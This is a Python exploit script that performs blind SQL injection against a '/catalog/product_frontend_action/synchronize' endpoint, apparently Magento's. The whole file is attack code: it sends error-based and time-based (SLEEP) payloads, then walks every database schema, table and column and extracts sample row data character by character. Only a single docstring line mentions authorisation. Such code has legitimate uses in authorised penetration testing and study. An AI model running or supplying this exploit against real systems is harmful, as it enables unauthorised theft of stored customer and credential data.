#!/usr/bin/env python3
"""Blind SQL injection probe and schema enumerator.

The script sends crafted GET requests to the target's
``/catalog/product_frontend_action/synchronize`` endpoint and infers the
truth of SQL conditions from the response (HTTP status or response time).
On top of that single true/false oracle it reconstructs strings one
character at a time.

Only run this against systems you are explicitly authorised to test.

Usage:
    script.py <url>
"""
import binascii
import string
import sys
import time
from typing import Optional

import requests

# TLS verification is disabled on the session below, so silence the
# per-request InsecureRequestWarning noise.
requests.packages.urllib3.disable_warnings()


class ExploitError(Exception):
    """Raised when a probing step cannot produce a usable result."""


class Browser:
    """Thin wrapper around a ``requests.Session`` bound to one base URL."""

    # Optional proxy URL applied to both http and https traffic when set.
    PROXY = None

    def __init__(self, url):
        """Create the session for *url* (any trailing slash is stripped)."""
        self.url = url.rstrip('/')
        self.s = requests.Session()
        self.s.verify = False
        if self.PROXY:
            self.s.proxies = {'http': self.PROXY, 'https': self.PROXY}


class SQLInjection(Browser):
    """True/false SQL oracle plus helpers that enumerate schema and data.

    ``find_test_method`` must be called first: it selects which oracle
    (``test_error`` or ``test_timebased``) is stored as ``self.test`` and
    used by every other method.
    """

    # Path of the endpoint that receives the injected parameter.
    ENDPOINT = "/catalog/product_frontend_action/synchronize"

    def encode(self, s: str) -> str:
        """Return *s* as a ``0x...`` hex literal, avoiding quote characters."""
        return '0x' + binascii.b2a_hex(s.encode()).decode()

    def _probe(self, payload: str):
        """Send one request carrying *payload* and return the response."""
        return self.s.get(
            f"{self.url}{self.ENDPOINT}",
            params={
                'type_id': 'recently_products',
                'ids[0][added_at]': '',
                'ids[0][product_id][from]': '?',
                'ids[0][product_id][to]': payload,
            },
        )

    def find_test_method(self):
        """Pick the first oracle that tells a true condition from a false one.

        Raises:
            ExploitError: if neither oracle behaves reliably.
        """
        for method in (self.test_error, self.test_timebased):
            # A usable oracle must say yes to a tautology and no to a
            # contradiction.
            if method('123=123') and not method('123=124'):
                self.test = method
                return
        raise ExploitError('No reliable injection test method found')

    def test_error(self, condition: str) -> bool:
        """Error-based oracle: report True when the server answers HTTP 400."""
        payload = (
            f"))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE {condition}) -- -"
        )
        response = self._probe(payload)
        return response.status_code == 400

    def test_timebased(self, condition: str) -> bool:
        """Time-based oracle: report True when the request takes over 1.5 s.

        The payload asks the database to sleep for 2 seconds when
        *condition* holds and 0 seconds otherwise.
        """
        payload = (
            f"))) OR (SELECT*FROM (SELECT SLEEP(IF({condition},2,0)))a) -- -"
        )
        start = time.time()
        self._probe(payload)
        return (time.time() - start) > 1.5

    def get_length(self, label: str, expr: str) -> int:
        """Return the length (1..99) of the string produced by *expr*.

        Raises:
            ExploitError: if no length in that range satisfies the oracle.
        """
        for i in range(1, 100):
            condition = f"LENGTH({expr})={i}"
            if self.test(condition):
                print(f"[+] {label} length = {i}")
                return i
        raise ExploitError(f"Failed to determine length of {label}")

    def word(self, label: str, sql_expr: str, size: Optional[int] = None,
             charset: Optional[str] = None) -> str:
        """Recover the string produced by *sql_expr* one character at a time.

        Args:
            label: Name used in progress output.
            sql_expr: SQL expression evaluating to the string to recover.
            size: Known length; determined via ``get_length`` when omitted.
            charset: Candidate characters; defaults to ASCII letters, digits
                and ``_-:.@#$%&*()``.

        Returns:
            The recovered string. Positions matching no candidate are
            rendered as ``?``. An empty string is returned when the length
            cannot be determined.
        """
        if charset is None:
            charset = string.ascii_letters + string.digits + '_-:.@#$%&*()'
        if size is None:
            try:
                size = self.get_length(label, sql_expr)
            except ExploitError:
                print(f"[!] Skipping {label}, unable to determine length")
                return ''

        result = ''
        for pos in range(1, size + 1):
            found = False
            for c in charset:
                condition = (
                    f"ASCII(SUBSTRING(({sql_expr}),{pos},1))={ord(c)}"
                )
                if self.test(condition):
                    result += c
                    # '\r' keeps the progress display on a single line.
                    print(f"{label} => {result}", end='\r')
                    found = True
                    break
            if not found:
                result += '?'
                print(f"[!] Failed to resolve char at pos {pos} for {label}")
        print()
        return result

    def get_current_db(self):
        """Return the name of the database the injected query runs in."""
        return self.word("Current DB", "DATABASE()")

    def get_databases(self, limit=10, current_first=True):
        """Return up to *limit* schema names.

        When *current_first* is true the current database is resolved first,
        placed at the head of the list and not repeated later.
        """
        dbs = []
        current = self.get_current_db() if current_first else None
        for i in range(limit):
            expr = (
                "(SELECT schema_name FROM information_schema.schemata "
                f"LIMIT {i},1)"
            )
            db = self.word(f"DB#{i+1}", expr)
            if db and db != current:
                dbs.append(db)
        return [current] + dbs if current else dbs

    def get_tables(self, db: str, limit: int = 10) -> list:
        """Return up to *limit* table names found in schema *db*."""
        tables = []
        for i in range(limit):
            expr = (
                "(SELECT table_name FROM information_schema.tables "
                f"WHERE table_schema={self.encode(db)} LIMIT {i},1)"
            )
            tbl = self.word(f"Table#{i+1}", expr)
            if tbl:
                tables.append(tbl)
        return tables

    def get_columns(self, db: str, table: str, limit: int = 10) -> list:
        """Return up to *limit* column names of *db*.*table*."""
        cols = []
        for i in range(limit):
            expr = (
                "(SELECT column_name FROM information_schema.columns "
                f"WHERE table_schema={self.encode(db)} "
                f"AND table_name={self.encode(table)} LIMIT {i},1)"
            )
            col = self.word(f"Col#{i+1}", expr)
            if col:
                cols.append(col)
        return cols

    def get_data(self, db: str, table: str, column: str,
                 limit: int = 5) -> list:
        """Return up to *limit* non-empty values of *column* in *db*.*table*.

        ``word`` already absorbs length-detection failures and returns an
        empty string for them, so such rows are simply left out.
        """
        # Printable ASCII minus '%' and the single quote.
        charset = string.printable.replace('%', '').replace("'", "")
        rows = []
        for i in range(limit):
            expr = f"(SELECT {column} FROM {db}.{table} LIMIT {i},1)"
            val = self.word(f"{column}@{i}", expr, charset=charset)
            if val:
                rows.append(val)
        return rows


def run(url):
    """Detect a working oracle for *url*, then walk and print the schema.

    Any ``ExploitError`` ends the walk and is reported on stdout.
    """
    sqli = SQLInjection(url)
    try:
        sqli.find_test_method()
        print("[+] Injection test method detected!")

        dbs = sqli.get_databases(limit=10)
        print(f"[+] Databases: {dbs}\n")

        for db in dbs:
            print(f"[>] Enumerating DB: {db}")
            tables = sqli.get_tables(db)
            print(f"[+] Tables: {tables}")
            for table in tables:
                cols = sqli.get_columns(db, table)
                print(f"[+] Columns in {table}: {cols}")
                for col in cols:
                    data = sqli.get_data(db, table, col)
                    print(f"[+] Sample data from {table}.{col}: {data}")
    except ExploitError as e:
        print(f"Error: {e}")


if __name__ == '__main__':
    if len(sys.argv) != 2:
        # Name the expected argument so the message is actionable.
        print(f"Usage: {sys.argv[0]} <url>")
        sys.exit(1)
    run(sys.argv[1])